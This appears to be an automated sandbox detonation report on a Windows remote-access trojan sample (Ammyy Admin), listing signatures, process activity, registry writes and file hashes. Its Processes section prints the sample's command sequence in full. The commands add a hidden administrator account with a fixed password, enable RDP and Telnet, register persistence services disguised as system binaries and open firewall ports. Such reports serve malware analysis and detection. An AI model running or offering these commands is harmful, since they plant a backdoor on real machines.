memory/1172-29-0x0000000000400000-0x0000000000548000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-05 23:26

Reported

2024-09-05 23:29

Platform

win10v2004-20240802-en

Max time kernel

125s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Grants admin privileges

Creates new service(s)

persistence execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PlugAndPlay\ImagePath = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\svchost.exe -service -debug" C:\Windows\SysWOW64\REG.exe N/A

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A

Password Policy Discovery

discovery

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Microsoft = "0" C:\Windows\SysWOW64\REG.exe N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\REG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2036 wrote to memory of 552 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4524 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\REG.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1448 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2996 wrote to memory of 2912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4116 wrote to memory of 2272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3284 wrote to memory of 2104 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2496 wrote to memory of 1440 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2908 wrote to memory of 3264 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\ce24e3f6a77491b84dab3c0a6b0203a1_JaffaCakes118.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4164,i,1330210614411927383,9239043499051775691,262144 --variations-seed-version --mojo-platform-channel-handle=1320 /prefetch:8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe" -silent

C:\Windows\SysWOW64\sc.exe

sc start mnmsrvc

C:\Windows\SysWOW64\sc.exe

sc Start TlntSvr

C:\Windows\SysWOW64\sc.exe

sc Start TermService

C:\Windows\SysWOW64\net.exe

net start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start FastUserSwitchingCompatibility

C:\Windows\SysWOW64\net.exe

net start TermService

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net.exe

net localgroup Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Àäìèíèñòðàòîðû Microsoft /add

C:\Windows\SysWOW64\net.exe

net localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Microsoft /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\sc.exe

sc stop "ProtocolWindows_ "

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user Microsoft skj2g43 /add /EXPIRES:NEVER /active:yes

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Àäìèíèñòðàòîðû Microsoft /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup Administrators Microsoft /add

C:\Windows\SysWOW64\sc.exe

sc delete "ProtocolWindows_ "

C:\Windows\SysWOW64\sc.exe

sc create "ProtocolWindows_ " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" displayname= "Protocol HTTP/SSL " type= own start= auto error= ignore

C:\Windows\SysWOW64\sc.exe

sc description "ProtocolWindows_ " "Ýòà ñëóæáa îáåñïå÷èâàåò áåçîïañíûé ïðîòîêîë ïåðåäà÷è äàííûõ ãèïåðòåêñòà (HTTPS) äëÿ ñëóæáû HTTP. Åñëè ýòà ñëóæáà îòêëþ÷åía, ëþáûå ñëóæáû, êîòîðûå ÿâíî çaâèñÿò îò íåå, íå ìîãóò áûòü çàïóùåíû. "

C:\Windows\SysWOW64\sc.exe

sc stop "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc delete "PlugAndPlay"

C:\Windows\SysWOW64\sc.exe

sc create "PlugAndPlay" displayname= "PlugAndPlay " binpath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" type= own start= auto error= ignore

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\services\PlugAndPlay" /v ImagePath /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe -service -debug" /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_REGDWORD /d 3389 /f

C:\Windows\SysWOW64\REG.exe

REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN" /v iexplore.exe /t REG_REGDWORD /d 0 /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe" ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram ctfmon.exe ENABLE

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 3389 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 31337 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 80 name = TCP

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening protocol = TCP port = 8080 name = TCP

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/1448-0-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\termserv.exe

MD5 c104fc64f8ed6950ce08a5d653e9e4d7
SHA1 e1186adecb3c647cbec0705df4a8aa80281790c9
SHA256 8ded98254676bb6a64435119df030d84e8186b75051b8a1e7928aa52c8bb3937
SHA512 2b6a7f44b34af744108769658391ff46e885f09f974c32f9a5b0b559bf9e93b1185acb8fe6841c74848e4e06ff9ee31aaca6a648d43f39ae16dcaa96d576335c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\lsass.exe

MD5 6e0966f100cb1f523179c0adba52d45a
SHA1 d3d27da135e1388bc6619bc3f81a3324d2e9d645
SHA256 71059380b8346728a26de74e7a721e63bd9f18e81f1eec76adeabd998fb13e3b
SHA512 3dbebfd08ab3df57fefe193cd98f6ab8aeeff3406d70cc56604d8d0144de2c2b18a56f99281c93d21849badd0d76cbb943d09ce6573271af94fefb4323fbeefd

memory/1448-21-0x0000000000400000-0x0000000000548000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\svchost.exe

MD5 5ccc02fe24848a903a6978366c51a7d1
SHA1 056be620e7bfec514d9a377820c0b716052a305f
SHA256 4beea8eb43740d7157fe4dd34126b07864ba0d44563008cb32a21b84e4452064
SHA512 c36c7d6b15c7a3277efe2f4f56a8f7147646c4a060d06ee8c465473f61b1cc513c41cbdd3ee2a2c26c3c499dd6b960c31a742fa7dda1467fd25cabe8aefc7f71

memory/1448-24-0x0000000000400000-0x0000000000548000-memory.dmp